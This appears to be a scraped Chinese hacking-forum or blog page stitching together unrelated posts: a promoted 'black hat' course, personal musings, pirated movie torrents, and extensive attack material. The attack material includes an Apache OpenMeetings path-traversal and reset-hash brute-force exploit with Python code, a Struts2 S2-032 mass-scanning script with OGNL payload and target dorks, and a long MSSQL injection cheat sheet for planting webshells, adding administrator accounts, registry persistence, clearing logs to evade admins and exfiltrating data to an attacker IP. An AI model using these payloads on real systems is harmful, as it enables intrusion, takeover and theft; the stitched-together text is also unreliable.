众所周知黑帽盒子内部以后门程序出名，此套系列课程是内部培训思路及方法的教程，价值不可估量。
此系列课程看完后绝对颠覆你的价值观和世界观。绝对值得收藏！目前下载链接还有效，大家记得及时下载！

内部项目八-养站技巧.rar

链接: http://pan.baidu.com/s/1hqrrN4C 密码: mq6n

有个人，爱过了就结束了；有句话，说过了就后悔了；有道伤，痛过了就麻木了；有颗心，颤过了就破碎了；一段爱情，过深了就剧终了；一段路口，过难了就错选了；有些东西，放久了就会变质的；有些事物，发展久了也会变质的；有些感情，因时间、距离而贬值；爱那么短，遗忘却那么长。

自从有了个女朋友，就对别的女生没任何兴趣了，以前是跟班里的女同学闹得很多，很热闹，也喜欢跟他们一起玩，但现在不喜欢太多的人，对不太熟悉的人也不想搭理，性格变得有些自闭了，做出一个决定很难，但承担一种结果，是很容易的，因为你无法逃避，每个人都要为自己的决定负责，想着也不小了，却还是觉得自己是个小孩子，每天都要为了明天，未来而打拼，心里有时候想的很多，能写的却很少，就是想着一些事，想着一些无聊的问题，以前都是很爱笑，很阳光的，（至少我自己觉得是这样的，现在好像变得很冷漠，对任何人都爱理不理，总之还是为自己的决定而负责吧），我很早之前就认为后悔没有什么卵用，还不如把时间放在多做点有意义的事上。手机一直关机，而且这破手机我不喜欢打电话，有事说事，很讨厌没完没了的聊天。心里也是压抑的很难受，想要做的很多，但到处束手束脚，很压抑啊（e）。好像把一些东西隐(yin)晦(dang)的表达出来了😁。

邀请码：

XSS平台地址：http://xss.sssie.com/

SSS论坛地址：http://www.sssie.com

上个月被D以后因为没时间一直就没管，只把数据弄好后就没做任何的优化和防护什么的，今天才有点点时间简单搞了下，以后有时间再努力做的更好，分享更多。有换友联的也直接可以给我留言。别说在不在，ok

Apache OpenMeetings 算是比较冷门的系统，国内比较少见，要么都在内网吧。
根据已经发布的漏洞：
Apache OpenMeetings ZIP文件路径遍历（穿越）漏洞(CVE-2016-0784)
Apache OpenMeeting可预测密码重置令牌漏洞(CVE-2016-0783)
存在理论上getshell的可行性；

1. 本地搭建openmeetings环境；
2. 验证ZIP文件路径穿越漏洞；
准备穿越用的zip；
将jsp脚本改名为aaaaaaaaaaaaaaaaas2.jsp
然后zip，

用UE打开，查找aaa（ASCII）

替换aaa为../

我们这里替换为 ../../../../ 跳4次
文件头和尾都有；
保存zip
上传：
管理员登录，找到backup/import

导入zip

会报一个错，不用理会的；

查看文件：

看来4跳走远了，3跳就够了；
其实jsp脚本放在openmeetings的根目录是不能运行的；但是我们放在css这样的目录就可以了；

效果如下：
:5080/openmeetings/css/aaaas2.jsp

如何获得shell就这样了；
Apache OpenMeeting可预测密码重置令牌漏洞
根据描述，查看源码，大概了解是这样的
private void sendHashByUser(User us, String appLink, UserDao userDao) throws Exception {     String loginData = us.getLogin() + new Date();     log.debug("User: " + us.getLogin());     us.setResethash(ManageCryptStyle.getInstanceOfCrypt().createPassPhrase(loginData));     userDao.update(us, -1L);     String reset_link = appLink + "?hash=" + us.getResethash();     String email = us.getAdresses().getEmail();     String template = ResetPasswordTemplate.getEmail(reset_link);     getBean(MailHandler.class).send(email, Application.getString(517), template);   }

hash=md5（user+java：Date（））
Java的Date（）格式输出是这样的
Thu Apr 28 10:52:24 CST 2016

操作如下：
这里有一个坑，忘记密码，我们看到的样子是这样的；

结果我个人的本地环境，居然是这样的；

当时也没有点，死活没有找到忘记密码在哪里点，结果点开之后更坑

原因是我在安装的时候选择了“中文”，这特么也太远了，那个是用户啊！
重置操作：

中文的

猜解hash
#coding=utf-8 import time,sys import requests,hashlib def md5(str):     m = hashlib.md5()     m.update(str)     return m.hexdigest() if __name__=='__main__':     reset_time_format=time.strftime("%a %b %d %H:%M:%S",time.localtime())     print 'Date_Time_Format:  '+reset_time_format+' CST 2016'     current_xtime=time.strftime("%a %b %d %H:",time.localtime())     opm_link=sys.argv[1]     opm_port=sys.argv[2]     opm_user=sys.argv[3]     opm_mins=sys.argv[4]     for i in range(0,60):         secs = ("%02d"%i)         date=current_xtime+str(opm_mins)+':'+str(secs)+' CST 2016'         #print date         hastr=opm_user+str(date)         rest_hash=md5(hastr)         url='http://'+opm_link+':'+opm_port+'/openmeetings/reset?hash='+rest_hash         reset_action=requests.get(url)         req_content=reset_action.text         if 'Password set' in req_content:             print 'User: '+opm_user+'\n'             print 'Password reset url is:\n'+url
估计不了前后几分钟，单独将分钟独立出来，效果：

重置操作

新密码登录，然后zip上传，穿越，得shell。

附注：
date（）是带时区的，Thu Apr 28 10:52:24 CST 2016 什么CET CST等；
因此针对国外的用户，这个时间是不一样的，因此问题在利用上需要猜的数量多了很多；

后来上了google，inurl：5080/openmeetings
居然发现了这个：
All Your Meetings Are Belong to Us: Remote Code Execution in Apache OpenMeetings
http://haxx.ml/post/141655340521/all-your-meetings-are-belong-to-us-remote-code
早知道就不搞环境，直接翻译一下算了。
文章中也提到了openmeetings根目录是不能运行jspshell的，但是他采用了另外的方式
修改配置，利用第三方插件来执行程序反弹

最后那句话，本人不仅菜，而且脸皮还厚，请不吝指正。

链接：http://pan.baidu.com/s/1qXZ0ryW 密码：t0vb

https://github.com/rootphantomer/exp

网络资产信息扫描

在渗透测试(特别是内网)中经常需要对目标进行网络资产收集，即对方服务器都有哪些IP，IP上开了哪些端口，端口上运行着哪些服务，此脚本即为实现此过程，相比其他探测脚本有以下优点：1、轻巧简洁,只需python环境，无需安装额外外库。2、扫描完成后生成独立页面报告。

此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指纹服务识别-->提取快照(若为WEB)-->生成结果报表

运行环境:python 2.6 +

参数说明
-h 必须输入的参数，支持ip(192.168.1.1)，ip段（192.168.1），ip范围指定（192.168.1.1-192.168.1.254）,ip列表文件（ip.ini），最多限制一次可扫描65535个IP。
-p 指定要扫描端口列表，多个端口使用,隔开 例如：22,23,80,3306。未指定即使用内置默认端口进行扫描(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017)
-m 指定线程数量 默认100线程
-t 指定HTTP请求超时时间，默认为10秒，端口扫描超时为值的1/2。
-n 不进行存活探测(ICMP)直接进行扫描。

结果报告保存在当前目录(扫描IP-时间戳.html)。

例子：
python NAScan.py -h 10.111.1
python NAScan.py -h 192.168.1.1-192.168.2.111
python NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6
python NAScan.py -h ip.ini -p port.ini -n

服务识别在server_info.ini文件中配置
格式为：服务名|默认端口|正则  例 ftp|21|^220.*?ftp|^220-
正则为空时则使用端口进行匹配，否则以正则匹配结果为准。

效果图

下载地址 http://down.future-sec.com/F-NAScan.zip
项目地址 https://github.com/ywolf/F-NAScan

欢迎大家反馈建议和BUG

不管效果怎么样，看到的，收集的都发出来了，自己去测试。

第一款、

大家都丢出来了，我也丢一个

效果图

PHP代码
< ?php /* Strutr 批量扫描工具 By:T0n9 */ error_reporting(0); if(empty($argv[1])){ print_r(" +==================================+ | S2-032命令执行批量扫描工具 | | http://www.moxia.org/ | | 墨侠团队 | | By:T0n9 | +==================================+ [+]程序还存在一些Bug 比如一些奇葩网站的回显误报相对较低 [+]扫完同目录生成文件名_ok.txt文本存放存在漏洞的网站 -&gt;php $argv[0] url.txt&lt;br ?>");exit;
}

$txt = explode("\n",file_get_contents($argv[1])); //要扫描的脚本

echo "[+]$argv[1] 共 ".count($txt)." 条\r\n";

//获取盘符路径POC
$poc = "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8";

for($i = 0;$i<count($txt);$i++){
if(!empty($txt[$i])){
$u = trim($txt[$i]).$poc;
$data_str = c($u);
if(stripos($data_str,"

检测工具

下载地址：
链接: http://pan.baidu.com/s/1jIlNJsM 密码: 9gbf
解压密码：www.t0n9.com (备注有)

第二款：

第一，集成S232漏洞
第二， 自动识别016 019 032三种漏洞
第三，写文件支持任意目录，批量还没有实现

因为批量还没写好，本来不发布的，现在想想发出来玩玩。

源码:http://pan.baidu.com/s/1bp0Vnen

编译好的：http://pan.baidu.com/s/1nv4E9Nb

第三款

接下来的这个就是大家都喜欢的批量了。

下载地址：http://gongju.aizhan.com/

关键字：

inurl:VloginUser.action inurl:Mail.action inurl:code.action inurl:reg.action inurl:Address.action inurl:!Index.action inurl:login.action inurl:Add.action inurl:pageslist.action inurl:action.Action inurl:Message.action inurl:Ldap.action inurl:getMul.action inurl:shouye.action inurl:logout.action inurl:Valid.action inurl:search.action inurl:Magazine.action inurl:news.action inurl:init.action inurl:Page.action inurl:create.action inurl:index2.action inurl:default.action inurl:welcome.action inurl:Name.action inurl:single.action inurl:updateForm.action inurl:SysStart.action inurl:adminlogin.action inurl:Offportal.action inurl:Buying.action inurl:Success.action inurl:exchange.action inurl:menu.action inurl:Load.action inurl:airport.action inurl:Email.action inurl:On.action inurl:show.action inurl:tain.action inurl:Login!input.action inurl:randomPicture.action

骚年们，开始撸起吧。

第四款

S2-032批量POC工具

刚回来看见主页被刷屏．．．估计是晚了，赶紧写了个脚本加入我的并发框架中．
用法看图

工具
https://github.com/Xyntax/POC-T

简陋的POC
https://github.com/Xyntax/POC-T/blob/master/module/S2032.py

so 现在看大牛们怎么采集url了

第五款：tangScan

http://www.tangscan.com/labs/3

最最最最后一个：K8大牛写的工具，灰常好用，还有K8飞刀，完美结合，自己百度K8的博客，百度都有的，在这儿不多赘述，免得浪费我搬砖的时间。

1、官方首页：http://aws.amazon.com

2、免费VPS：http://aws.amazon.com/free

3、VPS管理：https://console.aws.amazon.com/ec2/home

进入Amazon AWS，注册一个Amazon账号。

Amazon AWS申请要求验证信用卡，扣掉1美元验证费，如果你有双币种信用卡自然没有问题。

5、没有信用卡的朋友也没有关系，你可以申请财付通境外支付，经过测试用财付通的美国运通卡照样没有问题。

进入Amazon AWS亚马逊免费VPS申请地址，登录你的Amazon AWS账号，然后填写你的财付通的美国运通卡。当然你也可以填写你的双币种信用卡。

使用财付通的美国运通卡来通过Amazon AWS的信用卡认证，会被冻结2美元，共冻结两次。第一次是添加信用卡时Amazon AWS验证导致了财付通美元运通卡冻结1美元。

第二次是Amazon AWS为了认证信用卡，会在信用卡那里扣掉1美元作为验证费，等到你的服务到期后，这一美元还是会还给你的。至于被冻结的额外一美元，按照财付通美国运通卡结算，30天后会自动返回到财付通账户中。提交后接下来是电话验证，填写你的手机号码。点击下一步，页面上会出现4个数字。这时候你的手机会收到Amazon AWS的电话，等英语说完了，输入你在页面上看到的4个数字，这时Amazon AWS就会提示验证成功了。Amazon AWS亚马逊云服务免费VPS开通大概要几分钟，不过部分大概等了1个小时左右才可以正常使用。Amazon AWS的免费VPS使用时长是一年，主机配置自然是非常不错的，大家在选择Amazon AWS VPS时注意有些服务会产生收费，请仔细看清说明，否则一不小心则可能对你的信用卡或者美国运通卡收费了。

网络资产信息扫描

在渗透测试(特别是内网)中经常需要对目标进行网络资产收集，即对方服务器都有哪些IP，IP上开了哪些端口，端口上运行着哪些服务，此脚本即为实现此过程，相比其他探测脚本有以下优点：1、轻巧简洁,只需python环境，无需安装额外外库。2、扫描完成后生成独立页面报告。

此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指纹服务识别-->提取快照(若为WEB)-->生成结果报表

运行环境:python 2.6 +

参数说明
-h 必须输入的参数，支持ip(192.168.1.1)，ip段（192.168.1），ip范围指定（192.168.1.1-192.168.1.254）,ip列表文件（ip.ini），最多限制一次可扫描65535个IP。
-p 指定要扫描端口列表，多个端口使用,隔开 例如：22,23,80,3306。未指定即使用内置默认端口进行扫描(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017)
-m 指定线程数量 默认100线程
-t 指定HTTP请求超时时间，默认为10秒，端口扫描超时为值的1/2。
-n 不进行存活探测(ICMP)直接进行扫描。

结果报告保存在当前目录(扫描IP-时间戳.html)。

例子：
python NAScan.py -h 10.111.1
python NAScan.py -h 192.168.1.1-192.168.2.111
python NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6
python NAScan.py -h ip.ini -p port.ini -n

服务识别在server_info.ini文件中配置
格式为：服务名|默认端口|正则  例 ftp|21|^220.*?ftp|^220-
正则为空时则使用端口进行匹配，否则以正则匹配结果为准。

效果图


项目地址 https://github.com/ywolf/F-NAScan

没什么好说明的。从其他地方转来的。

ps:新做的一个自动网页制作系统。

http://www.umimi.cc

演示地址：http://www.y1mao.com/about/

既然有演示，就不截图上传了。自己捣鼓这看吧。我也没用，就分享了。

http://share.weiyun.com/f922fd0b6f69664712b0e84b481e721b

密码：3AFC

今天你装逼了吗？我自己问自己，装的好么，不要骗自己。

今天你们装逼了吗？反正我装了。拿去晒微信朋友圈，提高下自信。

上图上图上图。

需要安装字体文件。打开那个EXE文件，字体文件就会解压出来，最后下载插件的过程有点慢，差不多十几分钟左右的样子。等等就行了。

看了这么几个图，那么问题来了，装逼技术哪家强？

百度网盘：http://pan.baidu.com/s/1cofnKq

傻逼看不见，

PS：

导演: 袁和平
编剧: 约翰·福斯克 / 王度庐
主演: 甄子丹 / 杨紫琼 / 岑勇康 / 刘承羽 / 李截 / 更多...
类型: 剧情 / 动作 / 武侠 / 古装
制片国家/地区: 中国大陆 / 美国
语言: 国语/英语
上映日期: 2016-02-19(中国大陆) / 2016-02-26(美国)
片长: 103分钟
又名: 卧虎藏龙2：青冥宝剑 / 卧虎藏龙Ⅱ青冥宝剑 / 铁骑银瓶
IMDb链接: tt2652118
卧虎藏龙：青冥宝剑的剧情简介 · · · · · ·
武当弃徒戴阎王（李截 Jason Scott Lee 饰）为抢夺青冥古剑夜袭铁小贝勒府，俞秀莲（杨紫琼 饰）重出江湖，携手旧友孟思昭（甄子丹 饰）保护宝剑，被蒙蔽的魏方（岑勇康 Harry Shum Jr. 饰）助纣为虐，雪瓶（刘承羽 Natasha Liu Bordizzo 饰）告知魏方其身世之谜。一场江湖混战，众人力擒戴阎王，保护宝剑周全。
影片改编自王度庐小说《铁骑银瓶》。

解压密码：blog.xiaohack.org

下载地址：卧虎藏龙2：青冥宝剑【2G】.torrent

第1种：

regedit /e c:\\tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

然后type c:\\tsport.reg | find "PortNumber"
然后16进制转10进制查明文；这个网站可以转换http://jinzhi.supfree.net

c:\\tsport.reg可能会出现无法创建目录文件 自己找个可写目录吧

第2种方法：执行tasklist /svc
我们只要svchost.exe对应的PID号(svchost.exe TermService对应的PID号，请把PID记录下来)，然后执行netstat /ano查到pid对应的Local Address端口就是3389修改后的端口了

第3种 shell权限大点的话在注册表里直接查看 shell里的提权探测那里有些也能看到 有时43958可能提权了 可是权限低没法执行cmd wscript删了就传aspx马 再不行默认3389试试能远程连接不 扫1-9999查端口估计测试到手软 因为开放端口实在太多了 一个一个测试？

译　　名　Kung Fu Panda 3
片　　名　功夫熊猫3/熊猫阿宝3/阿宝正传3
年　　代　2016
国　　家　中国大陆 / 美国
类　　别　喜剧 / 动作 / 动画 / 冒险
上映日期　2016年1月29日 中国
语　　言　英语
字　　幕　简体中英 / 简体
链　　接　http://www.imdb.com/title/tt2267968/
评　　分　7.8/10 from 754 users
豆瓣评分　8.0/10 from 84,5856 users
豆瓣链接　http://movie.douban.com/subject/11589036/
文件格式　x264 + AAC
视频尺寸　1280 x 720
文件大小　1.98 GB
片　　长　95分钟
导　　演　亚历山德罗·卡罗尼  Alessandro Carloni
吕寅荣  Jennifer Yuh
主　　演　杰克·布莱克  Jack Black ... Po
布莱恩·科兰斯顿  Bryan Cranston
达斯汀·霍夫曼  Dustin Hoffman
安吉丽娜·朱莉  Angelina Jolie
J·K·西蒙斯  J.K. Simmons
塞斯·罗根Jackie Chan
塞斯·罗根  Seth Rogen
刘玉玲  Lucy Liu
David Cross
凯特·哈德森  Kate Hudson
吴汉章  James Hong
兰德尔·杜克·金  Randall Duk Kim

影视简介:

在新一集故事里，阿宝（杰克·布莱克 Jack Black 配音）失散已久的亲生父亲突然现身，重逢的父子二人一起来到了一片不为人知的熊猫乐土。在这里，阿宝遇到了好多滑稽的熊猫同类。当拥有神秘力量的大反派天煞（J·K·西蒙斯 J.K. Simmons 配音）横扫神州大地，妄图残害所有功夫高手时，阿宝必须迎难而上，学着把那些热爱享乐、笨手笨脚的熊猫村民训练成一班所向披靡的功夫熊猫！

影视截图:

2016.功夫熊猫3.HD超清中字.720P.torrent

百度网盘（速度保存） http://pan.baidu.com/s/1biotMe   提取密码 uqme

[功夫熊猫3][HC-HDRip.720P.MKV][1.93GB][中英字幕].torrent

MSSQL2005手工注入列目录写马

啊d能注入的话就不用往下看了
sqlmap能注入出密码

判断是否支持多行语句以下用法要求支持多行语句才能使用:
;declare @x int--
比如a.asp?id=1;declare @x int--
key.asp?kwyname=qq%';declare @x int-- and '%'='

返回页面和不加语句时的一样正常说明支持，当然一开始要求是注入点

参数后面加语句，有些过滤了--自己去突破要么不加，过滤了单引号我有办法绕过

建表p(i为自动编号,a记录盘符类似"c:\",b记录可用字节,其它省略)
URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));--

URL;insert p exec xp_availablemedia;--列出所有驱动器并插入表p

URL;and (select count(*) from p)>3;--折半法查出驱动器总数

URL;and ascii(substring((select a from p where i=1),1,1))=67;--折半法查出驱动器名(注asc(c)=67)

--上面一般用于无显错情况下使用-------以此类推,得到所有驱动器名

URL;and (select a from p where i=1)>3;--报错得到第一个驱动器名

--上面一般用于显错情况下使用-------以此类推,得到所有驱动器名

URL;;drop table p;--删除表p

--(2) ******查看目录方法******

URL;create table pa(m nvarchar(255),i nvarchar(255));--建表pa(m记录目录,i记录深度)

URL;insert pa exec xp_dirtree ’e:’;--列出驱动器e并插入表pa

URL;and (select count(*) from pa where i>0)>-1;--折半法查出i深度

URL;and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;--报错得到深度i=1的第一个目录名

--上面一般用显错且目录名不为数字情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录

URL;and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--折半法查出深度i=1的第一个目录名的长度

URL;and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--折半法查出深度i=1的第一个目录名的第一个字符长度

--上面一般用无显错情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录

URL;drop table pa;--删除表pa

----------------------------经过上面的方法就可得到服务器所有目录(这里为连接用户有读取权限目录)-----------------

--(3) 数据库备份到Web目录(先拿个WebShell再说吧 注:此为SQL Server2000)

URL;alter database employ_ set RECOVERY FULL;--把当前库L设置成日志完全恢复模式

URL;URL;create table s(l image);--建表s

URL;backup log s to disk = ’c:cmd’ with init;--减少备分数据的大小

URL;URL;insert s values(’<%execute(request("a"))%>’)--在表s中插入一句话马

URL;backup log hh to disk = ’e:\web\g.asp’;--备分日志到WEB路径

URL;drop table s;--删除表s

URL;alter database hh set RECOVERY SIMPLE;--把SQL设置成日志简单恢复模式

--------------------------------------OK到此WebShell应该到手了-----------------------------------------------

--(4) 以下为一些注入杂项

----SA权限:

URL;exec aster.dbo.sp_addlogin hacker;--添加SQL用户

URL;exec master.dbo.sp_password null,hacker,hacker;--设置SQL帐号hacker 的密码为 hacker

RL;exec master.dbo.sp_addsrvrolemember sysadmin hacker;--加hacker进sysadmin管理组

URL;exec master.dbo.xp_cmdshell ’net user hacker hacker /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;--建立一个系统用hacker 并设置其密码为hacker

URL;exec master.dbo.xp_cmdshell ’net localgroup administrators hacker /add’;--hacker加入到管理员组

----SQL Server2005暴库、表、段法(前提有显错、无显错用折半法)

URL and 0<(select count(*) from master.dbo.sysdatabases);--折半法得到数据库个数

URL and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--

--依次提交 dbid = 2.3.4... 得到更多的数据库名

URL and 0<(select count(*) name from employ.dbo.sysobjects where xtype=’U’);--折半法得到表个数(假设暴出库名employ)

URL and 0<(select top 1 name from employ.dbo.sysobjects where xtype=’U’)

-- 假设暴出表名为"employ_qj"则在上面语句上加条件 and name not in (’employ_qj’ 以此一直加条件....

URL and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = ’u’ and name = ’employ_qj’));--

--假设暴出字段名为"id"则在上面语句上加上条件 and name not is(’id’) 以此一直加条件....

---------------------按上面方法库、表、段的名称都可以得到----用以上方法可以得到段段里的数据--------------------

select * from master.dbo.sysdatabases --查询数据库

select * from NetBook.dbo.sysobjects where xtype=’u’ --查询数据库NetBook里的表

select * from NetBook.dbo.syscolumns where id=object_id(’book’) --查询book表里的字段

---------------------------------------------------------------------------------------------------------------

---------------------------------------SQL扩展沙盘提权-----------------------------------

看来xp_cmdshell是不能用鸟~ 不过偶们还有SP_OAcreate可以用 用SP_OAcreate一样可以执行系统命令
在查询分析器里执行
DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD
@shell,’run’,null, ’C:\WINdows\system32\cmd.exe /c net user gydyhook hook /add’
这段代码就是利用SP_OAcreate来添加一个gydyhook的系统用户 然后直接提升为管理员权限就OK了
提示命令完成成功
直接写
个一句话进去
语句如下
exec master.dbo.xp_subdirs ’d:\web\www.xx.com’;
exec sp_makewebtask ’d:\web\www.XXXX.com\XX.asp’,’select’’<%execute(request("SB"))%>’’ ’
提示命令执行成功偶们看看效果

查询分析器里执行select * from openrowset(’microsoft.jet.oledb.4.0’,’
;database=c:\windows\system32\ias\ias.mdb’,
’select shell("cmd.exe /c net user admin admin1234 /add")’)来利用沙盘来添加个管理员 但是事实告诉
我 我的RP并不好

嘿嘿 使用declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ’opentextfile’, @f out, ’d:\Serv-U6.3\ServUDaemon.ini’, 1
exec @ret = sp_oamethod @f, ’readline’, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, ’readline’, @line out
end
这段代码就可以把ServUDaemon.ini里的配置信息全部显示出来 嘿嘿 既然能看了那偶门不是一样可以写进去？
直接写一个系统权限的FTP帐号 进去
使用declare @o int, @f int, @t int, @ret int
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ’createtextfile’, @f out, ’d:\Serv-U6.3\ServUDaemon.ini’, 1
exec @ret = sp_oamethod @f, ’writeline’, NULL, 《这里添写自己写好的SU配置信息 刚才复制的那些都要
写上去》
然后执行一下 成功执行 我们再用存储过程看看写进去没有
OK 我XXXXXX 成功写进去了一个用户名为XXXX密码为空的系统权限的FTP 然后偶们在FTP里执行
quote siteXXXXXXX 提权就好了。 这里已经很熟悉了 就不写了。~ 然后用3389连一下 成功地到服务器权限
然后偶们再用set nocount on
declare @logicalfilename sysname,
@maxminutes int,
@newsize int 来清理掉SQL日志 免的被管理员发现

------
DECLARE @cmd INT EXEC sp_oacreate &apos;wscript.shell&apos;,@cmd output

EXEC sp_oamethod @cmd,&apos;run&apos;,null,&apos;cmd.exe /c net user renwoxin$Content$nbsp;test /add&a

------------------------------MSSQL db_owner注入利用xp_regwrite获得系统权限---------------------------------------

xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\currentversion\run’,’xwq1’,’REG_SZ’,’net user h86$ hacker /add’
呵呵，返回一个正常页面，说明成功完成拉，再在注射点输入
xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\currentversion\run’,’xwq2’,’REG_SZ’,’net localgroup administrators h86$ /add’

---------------------------------------------------------------------------------------------

简单的如where xtype=’U’，字符U对应的ASCII码是85，所以可以用where xtype=char(85)代替；

如果字符是中文的，比如where name=’用户’，可以用where name=nchar(29992)+nchar(25143)代替。

-------------------------------------------备份一句话木马----------------------------------------

日志备分WEBSHELL标准的七步:

1.InjectionURL’;alter database XXX set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)

2.InjectionURL’;create table cmd (a image)-- (新建立一个cmd表)

3.InjectionURL’;backup log XXX to disk = ’c:cmd’ with init-- (减少备分数据的大小)

4.InjectionURL’;insert into cmd (a) values (’<%%25eval(request("a")):response.end%%25>’)-- (插入一句话木马)

5.InjectionURL’;backup log XXX to disk = ’d:chinakmtest.asp’-- (备分日志到WEB路径）

6.InjectionURL’;drop table cmd-- （删除新建的cmd表）

7.InjectionURL’;alter database XXX set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)

注：InjectionURL是注入点，XXX是数据库名称.

数据库差异备份代码：
BACKUP/**/LOG/**/peihua/**/WITH/**/NO_LOG/**/DBCC/**/SHRINKDATABASE(peihua)--

dump/**/transaction/**/peihua/**/with/**/no_log--
0.dump transaction 数据库名 with no_log 清空日志

1、create table [dbo].[jm_tmp] ([cmd] [image])-- 创建一个表

2、 declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X6A006D00640063007700 backup database @a to disk = @s --备份数据库，@s为备份名称(jmdcw的16进制转换)

3、insert into [jm_tmp](cmd) values(0x3C2565786563757465287265717565737428226C222929253E)--将一句话木马 "<%execute(request("l"))%>"的16进制字符插入到表中

4、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=’C:Program FilesCommon FilesMicrosoft SharedWeb Server Extensions40isapihsqq.asp’ backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT --对数据库实行差异备份，备份的保存路径暂定为C盘目录，文件名为hsqq.asp。

5、drop table [jm_tmp]-- 删除此表。

---------------------------------------------------防--------------------------------------------

Function SafeRequest(ParaName,ParaType)
’--- 传入参数 ---
’ParaName:参数名称-字符型
’ParaType:参数类型-数字型(1表示以上参数是数字，0表示以上参数为字符)

Dim Paravalue
Paravalue=Request(ParaName)
If ParaType=1 then
If not isNumeric(Paravalue) then
Response.write "参数" & ParaName & "必须为数字型！"
Response.end
End if
Else
Paravalue=replace(Paravalue,"’","’’")
End if
SafeRequest=Paravalue
End function
-- 绕过单引号继续注入

URL;declare @cmd sysname select @cmd=这里为你要执行命令的16进制 exec master.dbo.xp_cmdshell @cmd;--

--先声明一个变量cmd，然后把我们的指令赋值给cmd

--sql server 2005下开启xp_cmdshell的办法

EXEC sp_configure ’show advanced options’, 1;RECONFIGURE;EXEC sp_configure ’xp_cmdshell’, 1;RECONFIGURE;

--SQL2005开启’OPENROWSET’支持的方法：

exec sp_configure ’show advanced options’, 1;RECONFIGURE;exec sp_configure ’Ad Hoc Distributed Queries’,1;RECONFIGURE;

--SQL2005开启’sp_oacreate’支持的方法:

exec sp_configure ’show advanced options’, 1;RECONFIGURE;exec sp_configure ’Ole Automation Procedures’,1;RECONFIGURE;

在db权限并且分离获取mssql数据库服务器ip的方法

1.本地nc监听 nc -vvlp 80

2.;insert into OPENROWSET(’SQLOLEDB’,’uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;’, ’select * from dest_table’) select * from src_table;--
---------------------------------以下为检测方法---------------------------------

--检测可否注入
=============================================================================
URL and 1=1;--正常页面
URL and 1=2;--出错页面

=============================================================================
--检测数据库的
=============================================================================
URL and (select count(*) from sysobjects)>0;--返回正常sql server
URL and (select count(*) from msysobjects)>0;--返回正常Access

=============================================================================
--检测路径的
=============================================================================
URL and (select count(*) from master.dbo.sysdatabases where name>0 and dbid=6)>0;--

=============================================================================
--检测表段的
=============================================================================
URL and exists (select * from admin);--

=============================================================================
--检测字段的
=============================================================================
URL and exists (select username from admin) ;--

=============================================================================
--检测ID
=============================================================================
URL and exists (select id from admin where ID=1) ;--

=============================================================================
--检测长度的
=============================================================================
URL and exists (select id from admin where len(username)=5 and ID=1);--

=============================================================================
--检测是否为MSSQL数据库
=============================================================================
URL and exists (select * from sysobjects) ;--

=============================================================================
--检测是否为英文 ;--
=============================================================================

URL and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1);-- ACCESS数据库
URL and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1) ;--MSSQL数据库

=============================================================================
--检测英文的范围
=============================================================================

URL and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1);--ACCESS数据库

URL and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1);--MSSQL数据库

=============================================================================
--检测那个字符
=============================================================================

URL and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1);--ACCESS数据库

URL and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1);--MSSQL数据库

◎译　　名　YipMan3
◎片　　名　叶问3
◎年　　代　2015
◎国　　家　中国大陆/香港
◎类　　别　剧情/传记/动作/历史
◎语　　言　汉语普通话/粤语/英语
◎上映日期　2015-12-24(香港)/2016-03-04(中国大陆)
◎IMDb评分  7.9/10 from 4,137 users
◎IMDb链接  http://www.imdb.com/title/tt2888046/
◎豆瓣评分　6.7/10 from 22,092 users
◎豆瓣链接　http://movie.douban.com/subject/11598977/
◎片　　长　105分钟
◎导　　演　叶伟信 Wilson Yip
◎主　　演　甄子丹 Donnie Yen
　　　　　　迈克·泰森 Mike Tyson
